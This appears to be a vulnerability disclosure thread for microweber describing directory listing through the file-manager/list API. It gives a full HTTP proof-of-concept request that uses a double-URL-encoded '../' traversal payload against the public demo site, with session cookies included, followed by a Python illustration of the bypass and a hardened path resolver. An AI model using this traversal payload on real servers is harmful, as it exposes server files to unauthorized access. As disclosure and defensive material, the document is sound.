Improper handling of parameter leads to listing any directory in microweber/microweber
Valid
Reported on Jul 4th 2022
Description
In the file-manager/list API, the server does not handle the path parameter properly, which allows listing any directory. To exploit, use double URL encoding to bypass the filter.
Proof of Concept
GET /demo/api/file-manager/list?path=%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/ HTTP/1.1
Host: demo.microweber.org
Cookie: remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//demo.microweber.org/demo/admin/; csrf-token-data=%7B%22value%22%3A%22C9vMXphqkoxzEVRFH0KGTbFGUk9B1bo1nbJPMXDQ%22%2C%22expiry%22%3A1656856275047%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
X-Pwnfox-Color: red
Te: trailers
Connection: close
PoC Image
Impact
This vulnerability exposes information about directories and files on the system, allowing attackers to see sensitive files on the server.
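As an added illustration, not code from the report or from microweber, the Python below shows why a ".." filter that runs after only one URL decode is bypassed by the PoC's %252e payload when the value is decoded a second time downstream, and a resolver that instead decodes to a fixed point and checks that the resolved path stays inside the upload root. BASE_DIR and the function names are constructed for the example.

```python
import os
from urllib.parse import unquote

# Constructed example root; the real application's upload root is not given on the page.
BASE_DIR = os.path.realpath("/var/www/uploads")

# The PoC's path parameter, double URL-encoded: %25 -> '%', so %252e -> %2e -> '.'
POC_PATH = "%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/"


def naive_check_passes(raw_param: str) -> bool:
    """Vulnerable pattern: the traversal filter only sees the value after one decode
    (what the web framework hands to the application), so %252e%252e decodes to
    %2e%2e and contains no literal '..' yet."""
    once = unquote(raw_param)
    return ".." not in once


def resolve_naive(raw_param: str) -> str:
    """The same value is URL-decoded a second time further down the stack before it
    reaches the filesystem, which turns %2e%2e into '..' after the filter has run."""
    twice = unquote(unquote(raw_param))
    return os.path.normpath(os.path.join(BASE_DIR, twice))


def inside_base(path: str) -> bool:
    """True only when the resolved path is BASE_DIR itself or lies beneath it."""
    return os.path.commonpath([BASE_DIR, os.path.realpath(path)]) == BASE_DIR


def safe_resolve(raw_param: str):
    """Hardened resolver: decode until the value stops changing (so no later decode
    can alter it), resolve against BASE_DIR, and reject anything that escapes.
    Returns the absolute path, or None when the request must be refused."""
    decoded = raw_param
    for _ in range(3):                    # bounded: refuse absurd nesting of encodings
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    else:
        return None
    candidate = os.path.realpath(os.path.join(BASE_DIR, decoded.lstrip("/")))
    return candidate if inside_base(candidate) else None
```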
We are processing your report and will contact the microweber team within 24 hours.
a year ago
We have contacted a member of the microweber team and are waiting to hear back
a year ago
The researcher's credibility has increased: +7
Hi, thanks for the report.
In order to list the files you need to have admin access.